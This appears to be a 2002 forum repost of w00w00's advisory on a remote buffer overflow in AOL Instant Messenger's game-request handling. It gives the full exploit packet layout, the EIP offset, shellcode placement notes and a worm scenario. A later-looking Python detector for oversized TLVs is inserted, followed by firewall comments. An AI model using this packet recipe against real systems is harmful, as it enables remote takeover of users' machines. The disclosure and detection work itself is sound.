Posted on 01/02/2002 8:06:57 AM PST by softengine
PRELUDE
Happy w00year! It has been a while, friends, but w00w00 is still going strong! w00w00 is over three years old now and still boasts the title of the world's largest non-profit security team. One thing remains true about the world of w00w00, though: we love to shake things up.
We'd like to take a moment and make an important point. Due to unfortunate circumstances, the environment of the security industry has changed for the worse. Most major vendors and security companies have all switched their policies to limited disclosure, leaving the end users still vulnerable to serious software flaws. Big corporate monopolists: 1, end-users cornered into using second-rate software: 0. Why? Two big reasons: the DMCA and using patriotism as an excuse to avoid disclosing vulnerabilities.
First, the Digital Millennium Copyright Act affects circumvention of anti-piracy mechanisms and reverse engineering. If a product is released in binary form only (e.g., AOL) to protect its technologies and one attempts to reverse engineer the file, it's a violation of the DMCA. There's no question who the lobbyists behind this law were: the big corporations. Not surprisingly, AOL Time Warner was one of the DMCA's biggest supporters. Find out more information about the DMCA at http://www.anti-dmca.org.
Second, Microsoft has "decried" information anarchy. Many major security companies have followed suit and the rest just bent to the pressure. However, blaming security research teams, such as w00w00, for releasing information on vulnerabilities is a cop-out. Whether or not security research teams release information on vulnerabilities, it doesn't change the fact that the vendor produced insecure software. Vulnerabilities are still exploited in the same way they were by the Internet Worm 13 years ago. Further, one can reasonably assume that a fair number of hackers are exploiting unpublished vulnerabilities.
By only silently updating products, computer users are unknowingly left vulnerable.
DESCRIPTION
AOL Instant Messenger (AIM) has a major security vulnerability in the latest stable (4.7.2480) and beta (4.8.2616) Windows versions. This vulnerability will allow remote penetration of the victim's system without any indication as to who performed the attack. There is no opportunity to refuse the request. This does not affect the non-Windows versions, because the non-Windows versions currently do not yet support the feature that this vulnerability occurs in.
This particular vulnerability results from an overflow in the code that parses a game request. The actual overflow appears to be in the parsing of TLV type 0x2711. This may be more generic and exploitable through other means, but AOL has not released enough information about their protocol for us to be able to determine that. Robbie Saunder's email yesterday should be enough of a hint which direction to look in.
We contacted the AOL Instant Messenger group but never received a response. Normally we would be inclined to provide a fix, but it is illegal to reverse engineer the AIM executable (DMCA and AIM's license agreement to thank), so we are unable to provide a patch which will modify it. Instead, we recommend Robbie Saunder's AIM Filter (http://www.ssnbc.com/wiz/) to protect yourselves.
IMPLICATIONS
AOL Instant Messenger (http://www.aim.com) has over 100 million users. We think that deserves repeating: 100 million users. Almost all of these users are Windows users and directly vulnerable to this.
The first implication is that AOL should feel the weight of responsibility and employ better software development practices. The developers of a product with so many users should be much more cautious and avoid overbloating with a multitude of features they didn't have time to properly test in the first place.
Overall, though, the implications of this vulnerability are huge and leave the door wide open for a worm not unlike those that Microsoft (*cough* corporate monopoly *cough*) Outlook, IIS, et al. have all had (Melissa, ILOVEYOU, CodeRed, nimda, etc.). An exploit could easily be amended to download itself off the web, determine the buddies of the victim, and then attack them also. Given the general nature of social networks and how they are structured, we predict that it wouldn't take long for such an attack to propagate.
To top everything off, the particular overflow described supra is relatively simple to exploit. The payload can be several thousand bytes long, which leaves lots of room for creative shellcode. In addition, the shellcode can have null bytes in it, as long as the shellcode is located after the offset to EIP in the shellcode. That is, the offset to EIP is 1723 bytes into TLV type 0x2711. So if the shellcode is located after offset 1726, null bytes can be left in.
EXPLOIT
This is the exploit packet generated by w00aimexp (without USE_FULL_SIZE defined):
FLAP header (6 bytes)
[\x2a] '*' (magic number)
[\x02] channel (data)
[\x00\x11] sequence number
[\x07\x87] packet length (1927 bytes)
SNAC header (10 bytes)
[\x00\x04] SNAC family (message)
[\x00\x06] SNAC type (outgoing message)
[\x00\x00] SNAC flags (none)
[\x00\x00\x00\x09] SNAC ID
[\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie
[\x00\x02] SNAC channel (data)
[\x0c] victim screen name length
[\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX] victim screen name
Now a set of TLV data types. There is a base container, type 0x05, that contains everything else. Inside of this are several smaller containers, with each TLV type following immediately after the previous. If those are misaligned, you'll receive a "busted SNAC payload" error.
[\x00\x05] TLV type (0x05)
[\x07\x62] TLV length (1890 bytes)
[\x00\x00] cookie marker
[\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie
Capability used to exploit this (libfaim calls it SAVESTOCKS): [\x09\x46\x13\x47\x4c\x7f\x11\xd1\x82\x22\x44\x45\x53\x54\x00\x00]
[\x00\x0a] TLV type (0x0a)
[\x00\x02] TLV length (2 bytes)
[\x00\x01] TLV data
[\x00\x0f] TLV type (0x0f)
[\x00\x00] TLV length (0)
[\x00\x0e] TLV type (0x0e)
[\x00\x02] TLV length (2 bytes)
["en"] TLV data (language)
[\x00\x0d] TLV type (0x0d)
[\x00\x08] TLV length (8 bytes)
["us-ascii"] TLV data (charset)
[\x00\x0c] TLV type (0x0c)
[\x00\x06] TLV length (6 bytes)
["w00w00"] TLV data (game's name?)
[\x00\x03] TLV type (0x03)
[\x00\x04] TLV length (4 bytes)
[\x40\xa3\x1e\x4f] TLV data
[\x00\x05] TLV type (0x05)
[\x00\x02] TLV length (2 bytes)
[\x14\x46] TLV data
[\x00\x07] TLV type (0x07)
[\x00\x4d] TLV length (77 bytes)
["aim:AddGame?name=w00w00&go1st=true&multiplayer=true&url=http://www.w00w00.org"] TLV data (game URL)
[\x27\x11] TLV type (0x2711)
[\x06\xbf] TLV length (22 + length of our shellcode = 1727 bytes)
[\x00\x00\x02\x00\x05\x07\x4c\x7f\x11\xd1\x82\x22\x44\x45\x53\x54\x00\x00\x00\x0b\x00\x09 + shellcode starts here]
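The framing above (FLAP header, SNAC header, ICBM body, a rendezvous TLV 0x05 wrapping inner TLVs) is regular enough that a defender can check it on the wire. The following parser is an added example, not w00w00's w00aimexp and not code from the advisory: it walks the layout exactly as the dump describes it, rejects misaligned TLVs the way the client does ("busted SNAC payload"), and raises an alert when the game-request TLV 0x2711 is long enough to reach the 1723-byte offset the advisory reports. The cookie and capability bytes are copied from the dump; the screen name, the filler bytes in the constructed test frames, the 1723 threshold default and all function names are my assumptions for the example.

```python
import struct

# Constants taken from the advisory's packet dump
FLAP_MAGIC = 0x2A
FLAP_CHANNEL_DATA = 0x02
SNAC_FAMILY_MESSAGE = 0x0004
SNAC_TYPE_OUTGOING = 0x0006
ICBM_CHANNEL_RENDEZVOUS = 0x0002
TLV_RENDEZVOUS = 0x0005
TLV_GAME_REQUEST = 0x2711
EIP_OFFSET = 1723  # offset into TLV 0x2711 reported by the advisory (assumed as alert threshold)

# Sample values: cookie and capability GUID are the ones shown in the dump
COOKIE = bytes.fromhex("a498a35654bff2fd")
CAPABILITY = bytes.fromhex("094613474c7f11d18222444553540000")


def parse_tlvs(buf):
    """Walk a run of TLVs (2-byte type, 2-byte length, value); raise on misalignment."""
    tlvs, off = [], 0
    while off < len(buf):
        if off + 4 > len(buf):
            raise ValueError("truncated TLV header at offset %d" % off)
        tlv_type, tlv_len = struct.unpack_from(">HH", buf, off)
        off += 4
        if off + tlv_len > len(buf):
            raise ValueError("TLV 0x%04x overruns its container" % tlv_type)
        tlvs.append((tlv_type, buf[off:off + tlv_len]))
        off += tlv_len
    return tlvs


def parse_frame(frame):
    """Parse FLAP + SNAC + ICBM framing; return None for frames that are not outgoing messages."""
    if len(frame) < 6 or frame[0] != FLAP_MAGIC:
        raise ValueError("not a FLAP frame")
    channel, _seq, length = struct.unpack_from(">BHH", frame, 1)
    body = frame[6:6 + length]
    if len(body) != length:
        raise ValueError("truncated FLAP payload")
    if channel != FLAP_CHANNEL_DATA:
        return None  # login/close channels carry no SNAC
    if len(body) < 10:
        raise ValueError("truncated SNAC header")
    family, subtype, _flags, _snac_id = struct.unpack_from(">HHHI", body, 0)
    if (family, subtype) != (SNAC_FAMILY_MESSAGE, SNAC_TYPE_OUTGOING):
        return None
    off = 10
    cookie, off = body[off:off + 8], off + 8
    icbm_channel = struct.unpack_from(">H", body, off)[0]
    off += 2
    name_len = body[off]
    off += 1
    screen_name = body[off:off + name_len].decode("ascii", "replace")
    off += name_len
    return {"cookie": cookie, "icbm_channel": icbm_channel,
            "screen_name": screen_name, "tlvs": parse_tlvs(body[off:])}


def inspect_game_request(frame, threshold=EIP_OFFSET):
    """Alert when a rendezvous message carries a TLV 0x2711 long enough to reach the saved EIP."""
    info = parse_frame(frame)
    result = {"alert": False, "game_tlv_len": None, "screen_name": None}
    if info is None or info["icbm_channel"] != ICBM_CHANNEL_RENDEZVOUS:
        return result
    result["screen_name"] = info["screen_name"]
    for tlv_type, value in info["tlvs"]:
        if tlv_type != TLV_RENDEZVOUS:
            continue
        # rendezvous block: 2-byte cookie marker, 8-byte cookie, 16-byte capability, then inner TLVs
        for inner_type, inner_value in parse_tlvs(value[2 + 8 + 16:]):
            if inner_type == TLV_GAME_REQUEST:
                result["game_tlv_len"] = len(inner_value)
                result["alert"] = len(inner_value) >= threshold
    return result


def build_sample_frame(game_tlv_len, screen_name=b"victim"):
    """Constructed test frame mirroring the dump's layout; TLV 0x2711 is plain 'A' filler."""
    inner = b"".join([
        struct.pack(">HH", 0x000A, 2) + b"\x00\x01",
        struct.pack(">HH", 0x000F, 0),
        struct.pack(">HH", 0x000E, 2) + b"en",
        struct.pack(">HH", 0x000D, 8) + b"us-ascii",
        struct.pack(">HH", 0x000C, 6) + b"w00w00",
        struct.pack(">HH", TLV_GAME_REQUEST, game_tlv_len) + b"A" * game_tlv_len,
    ])
    rendezvous = b"\x00\x00" + COOKIE + CAPABILITY + inner
    body = (struct.pack(">HHHI", SNAC_FAMILY_MESSAGE, SNAC_TYPE_OUTGOING, 0, 9)
            + COOKIE + struct.pack(">H", ICBM_CHANNEL_RENDEZVOUS)
            + bytes([len(screen_name)]) + screen_name
            + struct.pack(">HH", TLV_RENDEZVOUS, len(rendezvous)) + rendezvous)
    return struct.pack(">BBHH", FLAP_MAGIC, FLAP_CHANNEL_DATA, 0x11, len(body)) + body


if __name__ == "__main__":
    for n in (64, 1727):
        r = inspect_game_request(build_sample_frame(n))
        print("TLV 0x2711 length %4d -> alert=%s" % (n, r["alert"]))
```

The threshold is the advisory's own figure; a filter sitting in front of the client could reasonably use a much lower limit, since a legitimate game request is a short URL plus a handful of fields, and any 0x2711 value approaching a kilobyte has no benign reason to exist.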
Is there a reliable alternative out there that will let her IM her friends and relatives without the risk (or embarrassment) of having an AOL product installed on our machine?
This remote attack cannot be stopped even by a firewall like zone alarm, correct?
Whew! For a moment there I thought you were going to tell me that the guy who said he was from AOL Billing department and needed my password, was a phony.
I guess I'm safe.
Likely correct. If a firewall is programmed to permit application X to communicate inbound via port YYZZ, then AIM, using port YYZZ, will bypass the firewall allowing nefarious use of your entire system by those with knowledge of the security hole.
AOL Instant Messenger, Yahoo Messenger, MSN Messenger, ICQ and mIRC (Internet Relay Chat) are all popular free chat software programs that allow real time conversations and file transfers. To use with ZoneAlarm active, all chat software requires server rights. You assign these rights in the Programs panel.
It is strongly advised to check your chat software options to deny file transfers without prompting first. File transfer within chat programs is a means to distribute malware such as worms, viruses, nukes, and trojan horses. Check with your chat software vendor's help files for configuration options to maximize security.
mIRC and ICQ especially will be portscanned. mIRC and ICQ channels are breeding grounds for adventurous hackers seeking to harvest IP addresses. What they hope to determine is if you have a Trojan listening on a Windows port that can be accessed. This process is what is known as a "staging area" to launch denial of service attacks anonymously. The pitfall for good net citizens is not realizing their machines are being used as part of the staging area. Using chat software wisely in conjunction with ZoneAlarm and ZoneAlarm Pro will prevent this type of activity from breaching your computing environment.
By specifying that you trust an application within ZoneAlarm, you are giving that application the ability to communicate with the Internet. Therefore the onus is on users of chat software and public message forums to learn responsible web habits. Understanding the vulnerabilities of the software you use is the first step in protecting your technology investment.
As a tip for enabling mIRC to work with ZoneAlarm, we suggest disabling the IDENT feature located in the IDENT tab within mIRC.